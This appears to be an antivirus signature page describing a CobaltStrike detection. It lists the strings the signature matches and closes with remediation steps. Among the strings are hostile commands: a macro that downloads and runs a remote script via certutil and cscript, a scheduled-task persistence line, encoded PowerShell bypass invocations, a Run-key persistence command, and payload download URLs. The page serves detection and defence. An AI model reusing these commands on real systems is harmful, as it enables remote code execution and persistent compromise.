Concrete signature match: Virus Tool - Tool used to create or modify malware for 32-bit Windows platform, family CobaltStrike
This concrete detection identifies a CobaltStrike payload, a sophisticated adversary emulation framework widely abused by threat actors for post-exploitation. It establishes persistence via scheduled tasks, utilizes named pipes for capabilities like UAC bypass, keylogging, and system enumeration, and communicates with a command-and-control server, indicating an active and severe system compromise.
Relevant strings associated with this threat:
- \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
- S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
- C:\Users\Public\Music\cia.plan (PEHSTR)
- !C:\Users\Public\Music\SideBar.dll (PEHSTR)
- artifact64big.dll (PEHSTR_EXT)
- artifact32big.dll (PEHSTR_EXT)
- K[ZKK\OKM (PEHSTR_EXT)
- GetCommandLineA (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
- temp.dll (PEHSTR_EXT)
- ././., (PEHSTR_EXT)
- .,./., (PEHSTR_EXT)
- /posts/ (PEHSTR_EXT)
- /ivc/ (PEHSTR_EXT)
- /k&>}2 (SNID)
- QJM#/I (SNID)
- vN.6b (SNID)
- Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- beacon.dll (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- \\.\pipe\bypassuac (PEHSTR_EXT)
- \\.\pipe\keylogger (PEHSTR_EXT)
- /send%s (PEHSTR_EXT)
- rcap:// (PEHSTR_EXT)
- \\.\pipe\netview (PEHSTR_EXT)
- \\.\pipe\powershell (PEHSTR_EXT)
- \\.\pipe\screenshot (PEHSTR_EXT)
- \\.\pipe\elevate (PEHSTR_EXT)
- \\.\pipe\hashdump (PEHSTR_EXT)
- Global\SAM (PEHSTR_EXT)
- \\.\pipe\portscan (PEHSTR_EXT)
- \\%s\ipc$ (PEHSTR_EXT)
- \\.\pipe\sshagent (PEHSTR_EXT)
- COBALTSTRIKE (PEHSTR_EXT)
- %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
- \\%s\pipe\msagent_%x (PEHSTR_EXT)
- [command] (PEHSTR_EXT)
- \\.\pipe\mimikatz (PEHSTR_EXT)
- test.dll (PEHSTR_EXT)
- shellcodeexecute (PEHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
- AS\e\%r (SNID)
- could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
- spawn::decrypting... (PEHSTR)
- \regedit.exe (PEHSTR)
- tps://122.228.7.225/admin?file= (PEHSTR_EXT)
- 122.193.130.74 (PEHSTR_EXT)
- 121.207.229.145 (PEHSTR_EXT)
- File Download Success. (PEHSTR_EXT)
- download.exe (PEHSTR_EXT)
- /checker (PEHSTR_EXT)
- YG@JG\ (PEHSTR_EXT)
- |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
- HTTP/1.1 200 OK (PEHSTR_EXT)
- %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
- CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
- r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
- /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v (PEHSTR_EXT)
- /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
- 7I.S_T (SNID)
- \>~gZ (SNID)
- shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
- shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
- shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
- sync.(*Mutex).Lock (PEHSTR_EXT)
- crypto/cipher.xorBytes (PEHSTR_EXT)
- shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
- runtime.injectglist (PEHSTR_EXT)
- sync.(*Mutex).lockSlow (PEHSTR_EXT)
- sync.(*entry).load (PEHSTR_EXT)
- shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
- crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
- crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
- crypto/aes.decryptBlockGo (PEHSTR_EXT)
- 0.bin (PEHSTR_EXT)
- \Bypass_AV.pdb (PEHSTR_EXT)
- Bypass_AV.pdb (PEHSTR_EXT)
- InternetReadFile(...) (PEHSTR_EXT)
- HttpSendRequestA(...) (PEHSTR_EXT)
- /htEp (PEHSTR_EXT)
- oshi.at (PEHSTR_EXT)
- UserInitMprLogonScript (PEHSTR_EXT)
- %s as %s\%s: %d (PEHSTR_EXT)
- beacon.x64.dll (PEHSTR_EXT)
- Updater.dll (PEHSTR_EXT)
- Content-Type: application/octet-stream (PEHSTR_EXT)
- cmd /c C:\Windows\Temp (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- \SLN\HRM_SUB\ (PEHSTR_EXT)
- \HRM_SUB.pdb (PEHSTR_EXT)
- AVBypass.pdb (PEHSTR_EXT)
- http_dll.dat (PEHSTR_EXT)
- //rs.qbox.me/chtype/ (PEHSTR_EXT)
- Dbak/chdb:qiniu.png (PEHSTR_EXT)
- 252.72.131.228 (PEHSTR_EXT)
- 240.232.200.0 (PEHSTR_EXT)
- 0.0.65.81 (PEHSTR_EXT)
- 65.80.82.81 (PEHSTR_EXT)
- 86.72.49.210 (PEHSTR_EXT)
- 101.72.139.82 (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- Aborting... (PEHSTR_EXT)
- -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
- Press any key... (PEHSTR_EXT)
- http://144.48.240.85/18.exe (PEHSTR_EXT)
- 4Bejz8txQ/rDnf (PEHSTR_EXT)
- ShellCodeLoader\bin (PEHSTR_EXT)
- http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- \x91\xe1\xa19 (PEHSTR_EXT)
- \xE9\xE8\Xa1 (PEHSTR_EXT)
- 0ZNA3EZ4g.exe (PEHSTR_EXT)
- 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
- legacy.chunk.js (PEHSTR_EXT)
- windows\temp\ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
- namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
- windows.ini (PEHSTR)
- mgur730yw1.dll (PEHSTR_EXT)
- \Parallel_Asis.dll (PEHSTR_EXT)
- mscorsvc.dll (PEHSTR_EXT)
- 1.dll (PEHSTR_EXT)
- Loader.nim (PEHSTR_EXT)
- bcmode.nim (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- \.\PhysicalDrive0 (PEHSTR_EXT)
- temp\packed64-temp.pdb (PEHSTR_EXT)
- \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
- .sedata (PEHSTR_EXT)
- .gehc (PEHSTR_EXT)
- Release\movenpeak.pdb (PEHSTR_EXT)
- System.Web.ni.dll (PEHSTR_EXT)
- 0cobaltstrike-chtsec (PEHSTR_EXT)
- DetectAttack.dll (PEHSTR_EXT)
- x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
- nfvurg856lk63.dll (PEHSTR_EXT)
- programdata\3bef479.tmp (PEHSTR_EXT)
- Release\SetupEngine.pdb (PEHSTR_EXT)
- Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
- ;\$ r (PEHSTR_EXT)
- DllMain (PEHSTR_EXT)
- PolicyPlus.Resources.resources (PEHSTR_EXT)
- %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
- enhanced-google.com (PEHSTR_EXT)
- Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
- E2/L9L$@ (PEHSTR_EXT)
- CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
- \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
- QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
- New Project 2.exe (PEHSTR_EXT)
- raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
- .retplne (PEHSTR_EXT)
- wsc_UUIDS.dll (PEHSTR_EXT)
- D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
- on_avast_dll_unload (PEHSTR_EXT)
- peloader\peloader_64\ (PEHSTR_EXT)
- \Release\peloader (PEHSTR_EXT)
- AtomLdr.dll (PEHSTR_EXT)
- A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
- RunScript (PEHSTR_EXT)
- PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
- test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
- WindowsProject_bin.dll (PEHSTR)
- jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
- api.gogleapi.click/file/System/ (PEHSTR_EXT)
- Projects\evasionC_go\workingSpace (PEHSTR_EXT)
- _seh_filter_dll (PEHSTR_EXT)
- \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
- /|bD;X (SNID)
- MACOSX\pdf.pdf (PEHSTR_EXT)
- sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
- nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
- yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
- PT2MtVR9gr5.go (PEHSTR_EXT)
- CallDLLDynamic.pdb (PEHSTR_EXT)
- per_thread_data.cpp (PEHSTR_EXT)
- [*] Executing (PEHSTR_EXT)
- ConsoleApp1.exe (PEHSTR_EXT)
- n/q9) (SNID)
- krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)327629c21782f90f4bd5f7c0779d05e9dbe87244dbf6bbef6703293700f2a620Immediately isolate the compromised host from the network. Conduct a comprehensive forensic investigation to determine the initial compromise vector and extent of damage. Remove all identified malicious files, scheduled tasks, and persistence mechanisms. Reset all potentially compromised credentials, especially those with elevated privileges, and enhance endpoint security and network monitoring to prevent recurrence.